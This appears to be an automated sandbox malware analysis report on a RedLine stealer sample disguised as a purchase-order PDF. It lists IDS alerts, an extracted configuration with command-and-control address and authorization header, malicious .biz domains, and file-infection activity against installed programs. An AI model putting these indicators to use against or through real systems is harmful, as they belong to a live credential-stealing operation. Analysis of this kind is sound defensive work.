                            2024-10-10T10:07:48.611756+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:50.217086+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:51.539038+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:52.850906+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:55.012884+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:57.473457+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:08:00.032542+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:08:03.371412+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:08:05.405349+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:34.594611+020020460561A Network Trojan was detected212.162.149.532049192.168.2.549706TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:27.497755+020020460451A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:26.609785+020028508511Malware Command and Control Activity Detected192.168.2.54970718.141.10.10780TCP
                            2024-10-10T10:08:28.098339+020028508511Malware Command and Control Activity Detected192.168.2.55002234.211.97.4580TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                            Found malware configuration
                            Source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                            Multi AV Scanner detection for domain / URL
                            Source: uaafd.bizVirustotal: Detection: 10%Perma Link
                            Source: vjaxhpbji.bizVirustotal: Detection: 11%Perma Link
                            Source: pywolwnvd.bizVirustotal: Detection: 12%Perma Link
                            Source: vrrazpdh.bizVirustotal: Detection: 10%Perma Link
                            Source: xlfhhhm.bizVirustotal: Detection: 14%Perma Link
                            Source: ctdtgwag.bizVirustotal: Detection: 10%Perma Link
                            Source: tbjrpv.bizVirustotal: Detection: 12%Perma Link
                            Source: hehckyov.bizVirustotal: Detection: 11%Perma Link
                            Source: warkcdu.bizVirustotal: Detection: 10%Perma Link
                            Source: lrxdmhrr.bizVirustotal: Detection: 13%Perma Link
                            Source: ytctnunms.bizVirustotal: Detection: 11%Perma Link
                            Source: przvgke.bizVirustotal: Detection: 14%Perma Link
                            Source: npukfztj.bizVirustotal: Detection: 12%Perma Link
                            Source: dwrqljrr.bizVirustotal: Detection: 12%Perma Link
                            Source: sxmiywsfv.bizVirustotal: Detection: 13%Perma Link
                            Source: ecxbwt.bizVirustotal: Detection: 9%Perma Link
                            Source: bghjpy.bizVirustotal: Detection: 12%Perma Link
                            Source: damcprvgv.bizVirustotal: Detection: 11%Perma Link
                            Source: gytujflc.bizVirustotal: Detection: 14%Perma Link
                            Source: gvijgjwkh.bizVirustotal: Detection: 12%Perma Link
                            Source: deoci.bizVirustotal: Detection: 13%Perma Link
                            Source: gnqgo.bizVirustotal: Detection: 9%Perma Link
                            Source: ocsvqjg.bizVirustotal: Detection: 12%Perma Link
                            Source: cvgrf.bizVirustotal: Detection: 12%Perma Link
                            Source: wllvnzb.bizVirustotal: Detection: 12%Perma Link
                            Source: lpuegx.bizVirustotal: Detection: 12%Perma Link
                            Source: iuzpxe.bizVirustotal: Detection: 12%Perma Link
                            Source: bumxkqgxu.bizVirustotal: Detection: 10%Perma Link
                            Source: vyome.bizVirustotal: Detection: 10%Perma Link
                            Source: yhqqc.bizVirustotal: Detection: 10%Perma Link
                            Source: reczwga.bizVirustotal: Detection: 9%Perma Link
                            Source: nqwjmb.bizVirustotal: Detection: 12%Perma Link
                            Source: xccjj.bizVirustotal: Detection: 11%Perma Link
                            Source: dlynankz.bizVirustotal: Detection: 12%Perma Link
                            Source: vcddkls.bizVirustotal: Detection: 12%Perma Link
                            Source: gcedd.bizVirustotal: Detection: 9%Perma Link
                            Multi AV Scanner detection for submitted file
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeReversingLabs: Detection: 31%
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeVirustotal: Detection: 34%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeJoe Sandbox ML: detected
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000004.00000003.2117161798.0000000005820000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdb source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdb source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: _.pdb source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdb source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdb source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2787951511.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000005.00000003.2767066626.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdbGCTL source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdb source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
